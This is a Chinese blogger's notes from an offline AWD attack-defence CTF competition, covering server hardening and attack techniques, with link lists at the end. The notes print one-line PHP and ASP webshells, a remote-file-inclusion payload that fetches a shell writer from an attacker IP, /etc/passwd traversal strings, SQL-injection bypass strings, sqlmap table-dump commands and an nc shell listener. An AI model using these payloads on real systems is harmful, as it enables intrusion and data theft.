AWD

记录一下自己最近参加的线下攻防比赛,没时间学习了,就准备了几天,果然不出意外的被安全专业的大佬打得很惨。

缺点是不会攻击,我和我队友两个人就只有防,AWD防了400分,综合渗透拿了200分。

感觉自己的知识欠差很多,代码审计能力弱,写脚本能力弱,sql注入我一直学不会。最重要的是比赛前没有真正练习过,所以比赛时才没把技能发挥出来。谨记:多实践,学好代码审计,sql注入,手动写脚本!!

比完赛才对这两种比赛模式有了清晰的了解。

AWD就是每队有自己要维护的几台linux靶机,为低权限或者www权限,对自己的网站进行防守,对他人进行攻击。

综合渗透分外网,内网,专网,需要先渗透外网,在让外网作为跳板机访问内网,专网。

给了两个靶机是永恒之蓝漏洞,但比赛时没想到,就没法做,还有一台直接ssh登陆,就有几个flag。

比赛特别好,服务特别好,边打比赛,还有水果吃,住的宾馆,伙食很棒。对这次比赛满意,也涨了很多经验,督促自己如何去学习。下面是比赛时的源码。内附很多比赛之前看的网站,

一、ssh登陆,修改密码超级复杂,mobaxterm,xshell。

普通用户提权成root,根据kernel版本号找到对应的poc,exp提权。

二、下载源码,备份,/var/www/html 目录,mobaxterm,winscp,xftp等。

三、预留后门,御剑,k8飞刀,D盾,扫描目录,发现后门,注释代码。

四、修改数据库密码,

> mysql -u root -p

Show databases;

use mysql;

set password for root@localhost = password('123');  或者

update user set password = PASSWORD('要更换的密码') where user = 'root';

flush privileges;

show tables;可能有flag。

select * from typecho_flag;

五、关闭不必要的端口,要求的服务端口不能关,

netstat -napt ,lsof -i 查看端口,

kill -9 PID 杀掉进程

nmap -sV ip地址(-sV参数可以探测目标主机的服务器版本)

nmap扫描对方开启的端口,21,22,21,3306,进行爆破,msfconsole进入metasploit ,,,

六、代码审计  seay源代码审计好用,

常见漏洞:一句话木马,SQL注入、文件包含、文件上传,越权访问,命令执行。

  1. 一句话木马

  

防:vim自己的网站php文件,注释掉一句话木马,

<?php @eval($_REQUEST['c']); ?>     <?php @eval($_POST['c']); ?>

asp的一句话是:<%eval request("xx")%>

没有限制文件上传类型,允许后门上传

攻:菜刀连接一句话木马所在php的网站路径,输入密码,即可进入到后台,获取网站目录,进而上传大马,获取最高权限webshell。

没有的话,自行网站文件上传一句话木马,对文件类型有限制的话需要BurpSuite抓包,修改content type image/php,根据返回的路径,连接菜刀。

权限维持:1.不死马, 2. nc反弹shell  nc -lp 9999

  1. SQL注入漏洞

(1)用户登录,输入’测试存在sql注入点,万能密码 ' or 1='1   弱密码 admin/admin  火狐插件hackbar

select name,pass from tbAdmin where name='' or 1='1' and pass='123456'

(2)啊D扫描网站sql注入点,sqlmap注入,

比赛时Access数据库注入点:

http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2

sqlmap -u "url"  查看系统,版本

sqlmap -u "url" --dbs 爆数据库

sqlmap -u "url" --tables -D ctf 爆表

sqlmap -u "url" --column -D ctf -T users 爆列

sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass"  爆字段

网站数据库密码信息文件一般放在config.php中。

3.文件包含

(1)本地文件包含

localhost/a.php?file=/flag.txt

(2)远程文件包含

localhost/a.php?file=http:ip/echo.txt

利用,上传一句话木马

echo.txt 文件内容,会生成shell.php  内容为一句话木马。

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>

常见的文件包含函数,include(),include_once(),require(),require_once()

几种经典的测试方法:

?file=../../../../../etc/passwd  长目录截断

?page=file:///etc/passwd   读取敏感文件

?home=main.cgi

?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

4.越权访问   allow_url_fopen  =ON, allow_url_include =ON

水平越权:修改id,访问他人

垂直越权:知道管理后台的url,通过访问,提升权限,获取数据。

/admin/upload/config.php  越权访问,无需登陆,直接显示

  1. 命令执行漏洞

直接调用操作系统命令,常见php函数system,exec,shell_exec

 

七、网站防御

上WAF,文件监控,安全狗,

在文件头写上,require_once(‘waf.php’);

八、日志分析,根据自己攻击payload去攻击他人。

写脚本批量拿flag。

综合靶场

Nmap扫描靶机,查看系统,metasploit 漏洞利用,根据相应的系统内核漏洞,提权,

获取后台密码,登录后台,根目录下flag

创建新用户,添加到管理员组,远程目标靶机。

可能存在flag的位置:

  1. 御剑扫描,双击网页打开,存在flag。
  2. ssh登陆,系统根目录下,/var/www/html下
  3. mysql数据库字段中。
  4. 远程主机桌面,文件夹下。

==================网站合集====================

www.51elab.com/product02.html      易霖博
https://www.anquanke.com/        安全客  很棒
http://www.freebuf.com/         freebuf
http://www.mumaasp.com/139.html     很厉害的大马
http://webshell8.com/
http://www.jiaoben.net/wenzhanglist/93.html    脚本之家

==========================
线下赛笔记
https://blog.csdn.net/wy_97/article/details/78148705
http://www.sohu.com/a/211760248_99907709
https://www.anquanke.com/post/id/86984
https://www.anquanke.com/post/id/98574
https://www.anquanke.com/post/id/98653
https://www.anquanke.com/post/id/100991
https://www.anquanke.com/post/id/84675
http://tinyfisher.github.io/security/2017/10/02/CTF

http://www.freebuf.com/articles/web/118149.html

https://blog.csdn.net/like98k/article/details/80261603

=============================

https://www.exploit-db.com/exploits/15620/           漏洞
http://exploit.linuxnote.org/                内核漏洞
https://www.cnblogs.com/linuxsec/articles/6110887.html      提权
https://www.cnblogs.com/yuhuLin/p/7027342.html         普通用户提权
http://www.freebuf.com/sectool/121847.html         Linux提权?这四个脚本可以帮助你

https://github.com/Ares-X/AWD-Predator-Framework          AWD攻防赛webshell批量利用框架
https://github.com/admintony/Prepare-for-AWD      AWD线下赛脚本集合
https://github.com/ssooking/CTFDefense        CTFDefense
https://github.com/wupco/weblogger            针对ctf线下赛流量抓取(php)、真实环境流量抓取分析的工具
http://hackblog.cn/post/75.html             waf
https://jingyan.baidu.com/article/d45ad148a8338769552b803a.html   安全狗安装教程
http://www.safedog.cn/website_safedog.html             安全狗linux版:

https://blog.csdn.net/qq_36328915/article/details/79305166     kali中msf常用命令
http://www.freebuf.com/articles/5472.html                   w3af简单使用教程
https://www.cnblogs.com/zylq-blog/p/6694566.html         安装

http://blog.51cto.com/simeon/1981572            MySQL数据库***及漏洞利用总结
http://blog.51cto.com/diudiu/1678358           SQLmap配合一句话木马
                        利用Sqlmap进行Access和MySQL的注入
https://note.youdao.com/share/?id=62ecd676d896139c823591e8a8bcc708&type=note#/

CTF线下赛AWD总结相关推荐

  1. CTF线下赛AWD攻防准备

    CTF线下赛AWD攻防准备 最近发现一篇博客.感觉对CTF线下赛-AWD模式,总结比较好.于是学习了解了一下,为了方便寻找,把这篇博客复制了过来,并补充了点... 1.赛制流程:攻防模式(AWD)常见 ...

  2. awd的批量脚本 pwn_CTF线下赛AWD套路小结

    CTF线下赛AWD套路小结 本文已在先知社区发表,欢迎访问,链接h 最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一.AWD模式简介 AWD ...

  3. awd赛题的flag是什么意思_红帽杯线下赛AWD题目分析

    上周打了一场红帽杯的线下赛,可惜开具发挥失误服务器down了几轮一度垫底-最后才又勉强上了点儿分-..赛后对题目中的几处比较有意义的漏洞做了一下分析,写出了下面篇文章. web1 web1是一个wor ...

  4. ctf线下赛mysql密码_CTF线下攻防赛

    SSH登陆 两三个人进行分工,一个粗略的看下web,有登陆口的话,就需要修改密码,将情况反馈给队友,让登陆ssh的小伙伴进行密码的修改,改成炒鸡复杂.然后将Web目录下载下来,上WAF.文件监控.端口 ...

  5. CTF线下赛WAF【参考,自行修改】

    原文链接:http://www.cnblogs.com/Oran9e/p/7233478.html 作者:Oran9e 期待已久的WAF <?phperror_reporting(0);defi ...

  6. CTF线下AWD攻防模式的准备工作及起手式

    作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽 我自己在服务器上搭了一个cms来模拟AWD场景. 0X01 改ssh密码 官方在给出服务器密 ...

  7. ctf线下AWD攻防赛学习笔记

    Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...

  8. CTF线下AWD攻防步骤总结

    Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...

  9. ISCC线下赛参赛感悟

    关于ISCC线下赛参赛感悟(之前就想发出来了,但是一直没时间,刚好赶上了1024就浅浅发一下吧) 一句话感悟 我好菜呀,ctf菜,awd更菜. 关于CTF部分 总结: 大佬是真的牛,选择题290+,不 ...

最新文章

  1. java web nodejs_我的2013--从java web到nodejs
  2. 【Linux】40.date设定系统时间
  3. 《使用Nessus进行渗透测试》- 简介
  4. 自动跟随机器人:一种简易的自动跟随方案,自动跟随小车、自动跟随平衡小车、STM32、基于超声波的自动跟随小车
  5. 不得不说--自动化测试元素定位与用例设计
  6. C++/C--动态二维数组的内存分配与释放【转载】
  7. oss批量上传工具_OssExplorer一OSS的专用客户端工具【最新版】_Windows_Windows server 2008-云市场-阿里云...
  8. c java交互_C和Java程序之间的交互/通信
  9. [转]几种软件测试工具
  10. 网络收包流程-网络层处理流程ip_rcv(五)
  11. python跑酷游戏源码_开源一款酷跑游戏源码完整版
  12. 小米手机hbuilder开发者模式
  13. 运行Android项目时,报Installation failed due to invalid APK file!错误的解决办法
  14. 路由器和交换机的区别
  15. Python画一个中国地图玩玩
  16. 称重管理系统方案之车牌识别摄像机的应用
  17. linux定制欢迎界面motd,linux 界面 /etc/motd
  18. Mac Safari, Chrome 浏览器劫持 SearchSystem Search 恶意插件移除 尝试Brave浏览器
  19. 2.5.3 文法二义性的消除
  20. Python黑科技:暴力破解,你的密码真的安全么?

热门文章

  1. 计算机技术与软件业余资格测验证书,在大学能否领到网络工程师资格证?网络工程师考核..._出版资格_帮考网...
  2. 【推免攻略】五.2022年北交计算机学院夏令营、预推免保研经验
  3. 时间复杂度分析:递归算法
  4. SQLSERVER 2000 以及SQL Server 2005的版本号
  5. 水印watermark
  6. 《算法竞赛入门经典(第二版)》pdf
  7. Response to preflight request doesn‘t pass access control check: No ‘Access-Control-Allow-Origin跨域问题
  8. [SOA介绍]什么是SOA
  9. cmd批量创建文件和文件夹
  10. echarts折线图设置圆点_echarts 设置折线图单个数据小圆圈样式